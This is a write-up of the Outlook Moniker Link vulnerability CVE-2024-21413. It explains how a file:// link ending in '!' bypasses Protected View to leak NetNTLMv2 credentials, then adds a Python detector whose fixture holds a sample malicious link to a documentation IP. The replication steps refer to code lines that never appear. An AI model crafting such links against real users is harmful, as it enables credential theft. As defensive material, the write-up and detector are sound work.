Moniker Link (CVE-2024-21413)
On February 13, 2024, Microsoft reported a vulnerability in its Outlook application. I identified this vulnerability as CVE-2024-21413, whose severity was rated 9.8 (critical). The affected versions are:
| Edition | Version |
|---|---|
| Microsoft Office LTSC 2021 | Affected since version 19.0.0 |
| Microsoft 365 Apps for Enterprise | Affected since version 16.0.1 |
| Microsoft Office 2019 | Affected since version 16.0.1 |
This vulnerability works by bypassing Outlook's Protected View, a feature that opens content in a restricted, read-only mode and so prevents malicious scripts such as macros from running on the system.
The vulnerability bypasses Outlook's security mechanisms through a specific type of hyperlink called a Moniker Link, which gives the vulnerability its name. An attacker exploits it by sending the victim an email that contains the Moniker Link. When the victim clicks the link, the victim's NetNTLMv2 credentials are sent to the attacker.
Within a controlled environment it was possible to replicate the vulnerability step by step. The first thing to understand is that a Moniker Link of the form file:// in Outlook can make the victim attempt to open a file on a network share. That access uses the SMB protocol, which requires the user's credentials, so Outlook's Protected View blocks the link. However, adding a "!" to the link bypasses this Outlook security measure. The resulting code to exploit the vulnerability would be:
- Modify the Moniker Link on line 12 to reflect the IP of the attacker's machine
- Change the MAILSERVER on line 31 to the machine's IP

Recommendations:
- Do not open emails whose origin is unknown
- Preview emails before clicking on suspicious links
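The file:// plus "!" link shape described above is something a mail gateway or IR analyst can look for. The following detector is an added example, not code from the original write-up: it scans an email body (HTML or plain text) for file:// hyperlinks containing "!" and reports the SMB host each one would make Outlook authenticate to. The sample messages and the address 203.0.113.10 are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A file:// hyperlink whose target contains "!" is the Moniker Link shape
# discussed above; the "!" is what lets it slip past Protected View.
MONIKER_RE = re.compile(r"file://[^\s\"'<>]*![^\s\"'<>]*", re.IGNORECASE)


class _HrefCollector(HTMLParser):
    """Collects href attribute values from <a> tags in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def find_moniker_links(body):
    """Return [(link, host), ...] for every file://...!... link in an email body.

    Handles HTML (href attributes, which may contain spaces) and plain text
    (regex scan). `host` is the SMB server the victim would authenticate to.
    """
    collector = _HrefCollector()
    collector.feed(body)
    hits = []
    # href values are taken whole so a target containing spaces is not truncated
    for href in collector.hrefs:
        if href.lower().startswith("file:") and "!" in href:
            hits.append(href)
    # plain-text bodies (or links typed into the text) get the regex scan
    hits.extend(m.group(0) for m in MONIKER_RE.finditer(body))
    result = []
    for link in hits:
        host = urlsplit(link).hostname or ""
        if (link, host) not in result:  # the same link is often found twice
            result.append((link, host))
    return result


# Constructed sample messages (not real mail); 203.0.113.10 is a documentation address.
SAMPLE_HTML = ('<html><body><p>Invoice attached.</p>'
               '<a href="file://203.0.113.10/share/invoice.rtf!x">Open</a></body></html>')
SAMPLE_BENIGN = ('<a href="https://example.com/doc">doc</a> '
                 'see file://fileserver/share/readme.txt')

if __name__ == "__main__":
    for body in (SAMPLE_HTML, SAMPLE_BENIGN):
        print(find_moniker_links(body))
```

A hit is a reason to quarantine the message and to check egress logs for SMB (TCP 445) connections to the reported host.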